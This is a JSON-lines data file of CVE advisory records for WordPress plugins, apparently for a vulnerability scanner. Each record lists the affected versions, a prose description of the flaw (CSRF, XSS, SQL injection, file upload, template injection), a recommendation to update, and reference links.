{"CVE_ID":"CVE-2024-6412","slug":"html-forms","versionImpact":"1.3.33","versionEndExcluding":"1.3.34","description":"The HTML Forms  WordPress plugin before 1.3.34 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 1.3.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9eb0dad6-3c19-4fe4-a20d-d45b51410444\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9eb0dad6-3c19-4fe4-a20d-d45b51410444\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6243","slug":"html-forms","versionImpact":"1.3.32","versionEndExcluding":"1.3.33","description":"The HTML Forms  WordPress plugin before 1.3.33 does not sanitize and escape the form message inputs, allowing high-privilege users, such as administrators, to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disabled.","recommendation":"Update to version 1.3.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4097877-ba19-4738-a994-9593b9a5a635\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4097877-ba19-4738-a994-9593b9a5a635\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12030","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.5","versionEndExcluding":"1.3.3.6","description":"The MDTF \u2013 Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to SQL Injection via the 'key' attribute of the 'mdf_value' shortcode in all versions up to, and including, 1.3.3.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-meta-data-filter-and-taxonomy-filter\\\/trunk\\\/classes\\\/shortcodes.php?rev=3204774#L874\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-meta-data-filter-and-taxonomy-filter\\\/trunk\\\/classes\\\/shortcodes.php?rev=3204774#L874\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210333%40wp-meta-data-filter-and-taxonomy-filter&new=3210333%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210333%40wp-meta-data-filter-and-taxonomy-filter&new=3210333%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2ead824-2722-4b09-8387-e064dee371c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2ead824-2722-4b09-8387-e064dee371c1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50451","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.4","versionEndExcluding":"1.3.3.5","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF) allows Stored XSS.This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n\/a through 1.3.3.4.","recommendation":"Update to version 1.3.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50450","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.4","versionEndExcluding":"1.3.3.5","description":"Improper Control of Generation of Code ('Code Injection') vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF) allows Code Injection.This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n\/a through 1.3.3.4.","recommendation":"Update to version 1.3.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-4-bypass-vulnerability-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-4-bypass-vulnerability-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8624","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.3","versionEndExcluding":"1.3.3.4","description":"The MDTF \u2013 Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to SQL Injection via the 'meta_key' attribute of the 'mdf_select_title' shortcode in all versions up to, and including, 1.3.3.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f50812a-c6a7-4bb3-9833-e10acd0460c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f50812a-c6a7-4bb3-9833-e10acd0460c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153150%40wp-meta-data-filter-and-taxonomy-filter&new=3153150%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153150%40wp-meta-data-filter-and-taxonomy-filter&new=3153150%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8623","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.3","versionEndExcluding":"1.3.3.4","description":"The The MDTF \u2013 Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.3.3.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba584e02-5242-4869-a452-21e6b8995bd8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba584e02-5242-4869-a452-21e6b8995bd8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-meta-data-filter-and-taxonomy-filter\\\/trunk\\\/classes\\\/page.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-meta-data-filter-and-taxonomy-filter\\\/trunk\\\/classes\\\/page.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150646%40wp-meta-data-filter-and-taxonomy-filter&new=3150646%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150646%40wp-meta-data-filter-and-taxonomy-filter&new=3150646%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34434","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.2","versionEndExcluding":"1.3.3.3","description":"Incorrect Authorization vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF) allows Code Inclusion, Functionality Misuse.This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n\/a through 1.3.3.2.","recommendation":"Update to version 1.3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-2-arbitrary-shortcode-execution-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-2-arbitrary-shortcode-execution-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-32818","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3","versionEndExcluding":"1.3.3.1","description":"Missing Authorization vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF).This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n\/a through 1.3.3.","recommendation":"Update to version 1.3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47548","slug":"integrate-google-drive","versionEndExcluding":"1.3.3","description":"URL Redirection to Untrusted Site ('Open Redirect') vulnerability in SoftLab Integrate Google Drive \u2013 Browse, Upload, Download, Embed, Play, Share, Gallery, and Manage Your Google Drive Files Into Your WordPress Site.This issue affects Integrate Google Drive \u2013 Browse, Upload, Download, Embed, Play, Share, Gallery, and Manage Your Google Drive Files Into Your WordPress Site: from n\/a through 1.3.2.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/integrate-google-drive\\\/wordpress-integrate-google-drive-plugin-1-3-0-open-redirection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/integrate-google-drive\\\/wordpress-integrate-google-drive-plugin-1-3-0-open-redirection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5251","slug":"grid-plus","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Grid Plus plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'grid_plus_save_layout_callback' and 'grid_plus_delete_callback' functions in versions up to, and including, 1.3.2. This makes it possible for authenticated attackers with subscriber privileges or above, to add, update or delete grid layout.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.2\\\/core\\\/ajax_be.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.2\\\/core\\\/ajax_be.php#L10\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.2\\\/core\\\/ajax_be.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.2\\\/core\\\/ajax_be.php#L69\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2d34c84-473c-49f8-b55c-c869b5479974?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2d34c84-473c-49f8-b55c-c869b5479974?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1069","slug":"contact-form-entries","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Contact Form Entries plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation on the 'view_page' function in versions up to, and including, 1.3.2. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/120313be-9f98-4448-9f5d-a77186a6ff08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/120313be-9f98-4448-9f5d-a77186a6ff08?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/trunk\\\/includes\\\/plugin-pages.php?rev=3003884#L1213\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/trunk\\\/includes\\\/plugin-pages.php?rev=3003884#L1213\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028640\\\/contact-form-entries#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028640\\\/contact-form-entries#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5715","slug":"plerdy-heatmap","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Website Optimization \u2013 Plerdy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's tracking code settings in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db18ac07-2e7a-466d-b00c-a598401f8633?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db18ac07-2e7a-466d-b00c-a598401f8633?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/plerdy-heatmap\\\/trunk\\\/plerdy_heatmap_tracking.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/plerdy-heatmap\\\/trunk\\\/plerdy_heatmap_tracking.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2989840%40plerdy-heatmap&new=2989840%40plerdy-heatmap&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2989840%40plerdy-heatmap&new=2989840%40plerdy-heatmap&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2254","slug":"ko-fi-button","versionEndExcluding":"1.3.3","description":"The Ko-fi Button WordPress plugin before 1.3.3 does not properly some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disallowed (for example in multisite setup), and we consider it a low risk.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8886ec5f-8465-448f-adbd-68a3e84c5dec\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8886ec5f-8465-448f-adbd-68a3e84c5dec\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4193","slug":"testimonial-slider","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Testimonial Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'testimonialcategory' shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080579%40testimonial-slider&new=3080579%40testimonial-slider&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080579%40testimonial-slider&new=3080579%40testimonial-slider&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd7ed687-4049-4957-86e9-b2f59621c747?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd7ed687-4049-4957-86e9-b2f59621c747?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4082","slug":"joli-faq-seo","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Joli FAQ SEO \u2013 WordPress FAQ Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.2. This is due to missing or incorrect nonce validation when saving settings. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081648%40joli-faq-seo%2Ftrunk&old=3076380%40joli-faq-seo%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081648%40joli-faq-seo%2Ftrunk&old=3076380%40joli-faq-seo%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c45b6163-7ebf-4f18-afd6-735d02d9170d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c45b6163-7ebf-4f18-afd6-735d02d9170d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13436","slug":"appsero-helper","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Appsero Helper plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.2. This is due to missing or incorrect nonce validation on the 'appsero_helper' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253119%40appsero-helper&new=3253119%40appsero-helper&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253119%40appsero-helper&new=3253119%40appsero-helper&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0d0c31e-1641-48e6-bd3e-47d8afb1b3b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0d0c31e-1641-48e6-bd3e-47d8afb1b3b8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11746","slug":"gs-woo-brands","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Discover the Best Woocommerce Product Brands Plugin for WordPress \u2013 Woocommerce Brands Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'product_brand' shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-woo-brands\\\/tags\\\/1.3.1\\\/woocommerce-brand.php#L299\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-woo-brands\\\/tags\\\/1.3.1\\\/woocommerce-brand.php#L299\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235325%40gs-woo-brands&new=3235325%40gs-woo-brands&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235325%40gs-woo-brands&new=3235325%40gs-woo-brands&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/443cfb7b-4566-4a71-ac31-5a5361c58aa2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/443cfb7b-4566-4a71-ac31-5a5361c58aa2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5677","slug":"featured-image-generator","versionImpact":"1.3.1","versionEndExcluding":"1.3.3","description":"The Featured Image Generator plugin for WordPress is vulnerable to unauthorized image upload due to a missing capability check on the fig_save_after_generate_image function in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary images to a post-related gallery.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56161d67-7378-4349-8fe5-da73da36afa0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56161d67-7378-4349-8fe5-da73da36afa0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-generator\\\/tags\\\/1.3.1\\\/admin\\\/class-featured-image-generator-admin.php#L575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-generator\\\/tags\\\/1.3.1\\\/admin\\\/class-featured-image-generator-admin.php#L575\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13549","slug":"all-bootstrap-blocks","versionImpact":"1.3.26","versionEndExcluding":"1.3.27","description":"The All Bootstrap Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \"Accordion\" widget in all versions up to, and including, 1.3.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228370\\\/all-bootstrap-blocks\\\/trunk\\\/blocks\\\/accordion-item.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228370\\\/all-bootstrap-blocks\\\/trunk\\\/blocks\\\/accordion-item.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/786e16be-dee9-43de-afe3-dcc0d17bc92b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/786e16be-dee9-43de-afe3-dcc0d17bc92b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12583","slug":"integration-dynamics","versionImpact":"1.3.23","versionEndExcluding":"1.3.24","description":"The Dynamics 365 Integration plugin for WordPress is vulnerable to Remote Code Execution and Arbitrary File Read in all versions up to, and including, 1.3.23 via Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.","recommendation":"Update to version 1.3.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-dynamics\\\/trunk\\\/src\\\/Shortcode\\\/Twig.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-dynamics\\\/trunk\\\/src\\\/Shortcode\\\/Twig.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210927\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210927\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f3dac5a-9ff8-4e8c-8c73-422123e121d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f3dac5a-9ff8-4e8c-8c73-422123e121d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4691","slug":"easync-booking","versionImpact":"1.3.21","versionEndExcluding":"1.3.22","description":"The Free Booking Plugin for Hotels, Restaurants and Car Rentals \u2013 eaSYNC Booking plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.3.21 via the 'view_request_details' due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to view the details of any booking request. The vulnerability was partially patched in versions 1.3.18 and 1.3.21.","recommendation":"Update to version 1.3.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easync-booking\\\/tags\\\/1.3.17\\\/easync.php#L4859\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easync-booking\\\/tags\\\/1.3.17\\\/easync.php#L4859\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243634\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243634\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293607\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293607\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300408\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300408\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c9953b3-dd09-4c80-be11-4daf3bbac720?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c9953b3-dd09-4c80-be11-4daf3bbac720?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0061","slug":"judgeme-product-reviews-woocommerce","versionEndExcluding":"1.3.21","description":"The Judge.me Product Reviews for WooCommerce WordPress plugin before 1.3.21 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1d0d131-c773-487e-88f8-e3d63936fbbb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1d0d131-c773-487e-88f8-e3d63936fbbb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
